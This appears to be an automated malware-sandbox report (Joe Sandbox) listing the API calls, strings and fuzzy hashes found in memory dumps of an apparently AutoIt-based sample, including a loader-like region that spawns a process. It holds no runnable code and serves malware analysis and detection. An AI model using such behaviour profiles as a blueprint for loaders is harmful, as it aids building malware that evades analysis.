                                    • Instruction Fuzzy Hash: 5B51D330D04249EBEF11DBB4D809BEEBB79AF19304F004199E609BB2C1D7B91B45CB66
                                    APIs
                                      • Part of subcall function 00985374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A41148,?,009861FF,?,00000000,00000001,00000000), ref: 00985392
                                      • Part of subcall function 009849FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00984A1D
                                    • _wcscat.LIBCMT ref: 009F2D80
                                    • _wcscat.LIBCMT ref: 009F2DB5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _wcscat$FileModuleNameOpen
                                    • String ID: \$\Include\
                                    • API String ID: 3592542968-2640467822
                                    • Opcode ID: 0ab41c1243e2830e0db89bffb25464313cf0f2cfe465b8973b661b540e5a1582
                                    • Instruction ID: f281bdf6a44eaeafbc264ff997f52f722b64f862c92f2cc6b40ecb7219a7f2b7
                                    • Opcode Fuzzy Hash: 0ab41c1243e2830e0db89bffb25464313cf0f2cfe465b8973b661b540e5a1582
                                    • Instruction Fuzzy Hash: ED51657D4043409FC714EFA9D981BAAB7F8FFDA300B804A2EF64597261EB319549CB51
                                    APIs
                                    • __getstream.LIBCMT ref: 009A34FE
                                      • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 009A3539
                                    • __wopenfile.LIBCMT ref: 009A3549
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                    • String ID: <G
                                    • API String ID: 1820251861-2138716496
                                    • Opcode ID: d011c5d47cdb58f56df8e94be1aec8ea7e3142591cfed6364f25de72fcaf6d29
                                    • Instruction ID: 82a7b5bd6e3cea00c3dcde19f71b789cf3b4dc9c3a0f3bbfba624219139fdf9b
                                    • Opcode Fuzzy Hash: d011c5d47cdb58f56df8e94be1aec8ea7e3142591cfed6364f25de72fcaf6d29
                                    • Instruction Fuzzy Hash: 0C11A770A00306ABDB11BFB49C4276E76F8AF8B350B15C925F419D7291EB34CA1197E1
                                    APIs
                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0099D28B,SwapMouseButtons,00000004,?), ref: 0099D2BC
                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0099D28B,SwapMouseButtons,00000004,?,?,?,?,0099C865), ref: 0099D2DD
                                    • RegCloseKey.KERNELBASE(00000000,?,?,0099D28B,SwapMouseButtons,00000004,?,?,?,?,0099C865), ref: 0099D2FF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: Control Panel\Mouse
                                    • API String ID: 3677997916-824357125
                                    • Opcode ID: 139467c8870f08e026b4f3ff36c705f0b121867e52eafa68fa2977c3e9226cae
                                    • Instruction ID: 54fe7f0a92269ec6b2e916f8c84bb62bd19061c085bfb641242e799af7f48351
                                    • Opcode Fuzzy Hash: 139467c8870f08e026b4f3ff36c705f0b121867e52eafa68fa2977c3e9226cae
                                    • Instruction Fuzzy Hash: 32113976612209BFDF208FA8CC85EAF7BBCEF54745F104869E806D7110E631AE429B60
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                    • String ID:
                                    • API String ID: 3877424927-0
                                    • Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                    • Instruction ID: dc2a922bee39842092e4a8102c9dfec1f6aec73142fa64310cad039e5c056384
                                    • Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                    • Instruction Fuzzy Hash: 7951A2B0A00305ABDB248FA9888566EB7B9AF42324F24C729F825962D0D775DF508BC0
                                    APIs
                                      • Part of subcall function 00984517: _fseek.LIBCMT ref: 0098452F
                                      • Part of subcall function 009CC56D: _wcscmp.LIBCMT ref: 009CC65D
                                      • Part of subcall function 009CC56D: _wcscmp.LIBCMT ref: 009CC670
                                    • _free.LIBCMT ref: 009CC4DD
                                    • _free.LIBCMT ref: 009CC4E4
                                    • _free.LIBCMT ref: 009CC54F
                                      • Part of subcall function 009A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,009A7A85), ref: 009A1CB1
                                      • Part of subcall function 009A1C9D: GetLastError.KERNEL32(00000000,?,009A7A85), ref: 009A1CC3
                                    • _free.LIBCMT ref: 009CC557
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                    • String ID:
                                    • API String ID: 1552873950-0
                                    • Opcode ID: 5018c003b2770254cf6d6f7fa2a1ed5b0fd5bc7f3c9d7989a998b0a79ed791d3
                                    • Instruction ID: bd44cbeff4031a48c0e3a6762d54e4d1a61b9199559fa50fe3c2d89635e1149b
                                    • Opcode Fuzzy Hash: 5018c003b2770254cf6d6f7fa2a1ed5b0fd5bc7f3c9d7989a998b0a79ed791d3
                                    • Instruction Fuzzy Hash: 68514EB1E04219AFDB149F64DC81BADBBB9EF48310F1044AEF25DA3251DB715A808F59
                                    APIs
                                    • _memset.LIBCMT ref: 009F3725
                                    • 7516D0D0.COMDLG32 ref: 009F376F
                                      • Part of subcall function 0098660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009853B1,?,?,009861FF,?,00000000,00000001,00000000), ref: 0098662F
                                      • Part of subcall function 009840A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009840C6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: NamePath$7516FullLong_memset
                                    • String ID: X
                                    • API String ID: 3926756254-3081909835
                                    • Opcode ID: f1bcd3e0c126fe58c62714a4954e901ff151f61da1a657df01a30a546137ea62
                                    • Instruction ID: 8320e39998196686aa3b36b395c024da4e2592e46d88db5bbcb4e9f00459de10
                                    • Opcode Fuzzy Hash: f1bcd3e0c126fe58c62714a4954e901ff151f61da1a657df01a30a546137ea62
                                    • Instruction Fuzzy Hash: 0E21A871A141989FCF01EFD4C845BEE7BF89F99304F008059E505EB341DBB85A898F65
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00CA8E4D
                                    • ExitProcess.KERNEL32(00000000), ref: 00CA8E6C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050453004.0000000000CA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CA7000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ca7000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Process$CreateExit
                                    • String ID: D
                                    • API String ID: 126409537-2746444292
                                    • Opcode ID: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
                                    • Instruction ID: eeb8c8eae30a0a5ba40e292bc558e28d21e81681570a44ba12f422211f385608
                                    • Opcode Fuzzy Hash: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
                                    • Instruction Fuzzy Hash: 37F0EC7554024DABDB60EFE0CC49FEE7778BF08705F508918BA1A9A184DB749A089B61
                                    APIs
                                    • GetTempPathW.KERNEL32(00000104,?), ref: 009CC72F
                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 009CC746
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Temp$FileNamePath
                                    • String ID: aut
                                    • API String ID: 3285503233-3010740371
                                    • Opcode ID: 8165df6e732b788588cfe06ad68caa0808bd4348c270085a19ae8d11c78f0c64
                                    • Instruction ID: 1acf0c4767ea78bc6ff420d7d7862763af22229bfd70b47af1f567cef363188b
                                    • Opcode Fuzzy Hash: 8165df6e732b788588cfe06ad68caa0808bd4348c270085a19ae8d11c78f0c64
                                    • Instruction Fuzzy Hash: 20D05E7250030EBBDB10EBE0DC0EFCA776CA704704F0005A07750A50B1DAB4E69B8B54
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 72da08699e4381460ef7ac4fc41a126b14d2edce25c83c52aea08475ca96f940
                                    • Instruction ID: 00b13ac2e8c232cfa6b9c9afcfdcdc129a0d9cc9d1be226837d3d5837a348adf
                                    • Opcode Fuzzy Hash: 72da08699e4381460ef7ac4fc41a126b14d2edce25c83c52aea08475ca96f940
                                    • Instruction Fuzzy Hash: 1CF16A716043419FCB10DF28C891B6AB7E5BFC8314F14896EF99A9B392D734E945CB82
                                    APIs
                                    • _memset.LIBCMT ref: 00985022
                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 009850CB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell__memset
                                    • String ID:
                                    • API String ID: 928536360-0
                                    • Opcode ID: 68ea5320907efcd707ad80caf7a11c43682e23e0770f7755147cbcf79e283e4a
                                    • Instruction ID: d345d2fccc6737b0e2dd772a8c21811a156b9ab505a27fb70a6974333f30d9c4
                                    • Opcode Fuzzy Hash: 68ea5320907efcd707ad80caf7a11c43682e23e0770f7755147cbcf79e283e4a
                                    • Instruction Fuzzy Hash: 9E3161B5504701CFD721EF68D845697BBE8FF89304F00092EE69E87351E772A989CB92
                                    APIs
                                    • __FF_MSGBANNER.LIBCMT ref: 009A3973
                                      • Part of subcall function 009A81C2: __NMSG_WRITE.LIBCMT ref: 009A81E9
                                      • Part of subcall function 009A81C2: __NMSG_WRITE.LIBCMT ref: 009A81F3
                                    • __NMSG_WRITE.LIBCMT ref: 009A397A
                                      • Part of subcall function 009A821F: GetModuleFileNameW.KERNEL32(00000000,00A40312,00000104,00000000,00000001,00000000), ref: 009A82B1
                                      • Part of subcall function 009A821F: ___crtMessageBoxW.LIBCMT ref: 009A835F
                                      • Part of subcall function 009A1145: ___crtCorExitProcess.LIBCMT ref: 009A114B
                                      • Part of subcall function 009A1145: ExitProcess.KERNEL32 ref: 009A1154
                                      • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                    • RtlAllocateHeap.NTDLL(00C70000,00000000,00000001,00000001,00000000,?,?,0099F507,?,0000000E), ref: 009A399F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                    • String ID:
                                    • API String ID: 1372826849-0
                                    • Opcode ID: ee62c520008f140f1686acc14663d8757e76ea1157ba10237d08d625a22c2fec
                                    • Instruction ID: f1066e868426c7ff09647d279b4cc672865869225fafa7ce99020550e8a9086d
                                    • Opcode Fuzzy Hash: ee62c520008f140f1686acc14663d8757e76ea1157ba10237d08d625a22c2fec
                                    • Instruction Fuzzy Hash: D301B536345301DAE6217BB8EC46B6B739C9FC3764F218125F6059B392DFB49D0186E0
                                    APIs
                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,009CC385,?,?,?,?,?,00000004), ref: 009CC6F2
                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,009CC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 009CC708
                                    • CloseHandle.KERNEL32(00000000,?,009CC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009CC70F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleTime
                                    • String ID:
                                    • API String ID: 3397143404-0
                                    APIs
                                    • _free.LIBCMT ref: 009CBB72
                                      • Part of subcall function 009A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,009A7A85), ref: 009A1CB1
                                      • Part of subcall function 009A1C9D: GetLastError.KERNEL32(00000000,?,009A7A85), ref: 009A1CC3
                                    • _free.LIBCMT ref: 009CBB83
                                    • _free.LIBCMT ref: 009CBB95
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    APIs
                                      • Part of subcall function 009822A4: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00982303
                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 009825A1
                                    • CoInitialize.OLE32(00000000), ref: 00982618
                                    • CloseHandle.KERNEL32(00000000), ref: 009F503A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                    • String ID:
                                    • API String ID: 458326420-0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __fread_nolock
                                    • String ID: EA06
                                    • API String ID: 2638373210-3962188686
                                    APIs
                                    • __wsplitpath.LIBCMT ref: 009CFEDD
                                    • GetLastError.KERNEL32(00000002,00000000), ref: 009CFF96
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorLast__wsplitpath
                                    • String ID:
                                    • API String ID: 2679896820-0
                                    APIs
                                      • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                    • __getbuf.LIBCMT ref: 009A8EFA
                                    • __lseeki64.LIBCMT ref: 009A8F6A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __getbuf__getptd_noexit__lseeki64
                                    • String ID:
                                    • API String ID: 3311320906-0
                                    APIs
                                    • 745AC8D0.UXTHEME ref: 00983A73
                                      • Part of subcall function 009A1405: __lock.LIBCMT ref: 009A140B
                                      • Part of subcall function 00983ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00983AF3
                                      • Part of subcall function 00983ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00983B08
                                      • Part of subcall function 00983D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00983AA3,?), ref: 00983D45
                                      • Part of subcall function 00983D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00983AA3,?), ref: 00983D57
                                      • Part of subcall function 00983D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00A41148,00A41130,?,?,?,?,00983AA3,?), ref: 00983DC8
                                      • Part of subcall function 00983D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00983AA3,?), ref: 00983E48
                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00983AB3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                    • String ID:
                                    • API String ID: 3809921791-0
                                    APIs
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00984582,?,?,?,?,00982E1A), ref: 0098482D
                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00984582,?,?,?,?,00982E1A), ref: 009F4089
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    APIs
                                    • ___lock_fhandle.LIBCMT ref: 009AEA29
                                    • __close_nolock.LIBCMT ref: 009AEA42
                                      • Part of subcall function 009A7BDA: __getptd_noexit.LIBCMT ref: 009A7BDA
                                      • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                    • String ID:
                                    • API String ID: 1046115767-0
                                    APIs
                                      • Part of subcall function 009A395C: __FF_MSGBANNER.LIBCMT ref: 009A3973
                                      • Part of subcall function 009A395C: __NMSG_WRITE.LIBCMT ref: 009A397A
                                      • Part of subcall function 009A395C: RtlAllocateHeap.NTDLL(00C70000,00000000,00000001,00000001,00000000,?,?,0099F507,?,0000000E), ref: 009A399F
                                    • std::exception::exception.LIBCMT ref: 0099F51E
                                    • __CxxThrowException@8.LIBCMT ref: 0099F533
                                      • Part of subcall function 009A6805: RaiseException.KERNEL32(?,?,0000000E,00A36A30,?,?,?,0099F538,0000000E,00A36A30,?,00000001), ref: 009A6856
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                    • String ID:
                                    • API String ID: 3902256705-0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __lock_file_memset
                                    • String ID:
                                    • API String ID: 26237723-0
                                    APIs
                                      • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                    • __lock_file.LIBCMT ref: 009A3629
                                      • Part of subcall function 009A4E1C: __lock.LIBCMT ref: 009A4E3F
                                    • __fclose_nolock.LIBCMT ref: 009A3634
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                    • String ID:
                                    • API String ID: 2800547568-0
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00000000,?,?,0099E581,00000010,?,00000010,?,00000000), ref: 0098C1F4
                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00000000,?,?,0099E581,00000010,?,00000010,?,00000000), ref: 0098C224
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide
                                    • String ID:
                                    • API String ID: 626452242-0
                                    APIs
                                      • Part of subcall function 00CA86E8: GetFileAttributesW.KERNELBASE(?), ref: 00CA86F3
                                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00CA8FF8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050453004.0000000000CA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CA7000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ca7000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AttributesCreateDirectoryFile
                                    • String ID:
                                    • API String ID: 3401506121-0
                                    APIs
                                    • __flush.LIBCMT ref: 009A2A0B
                                      • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __flush__getptd_noexit
                                    • String ID:
                                    • API String ID: 4101623367-0
                                    APIs
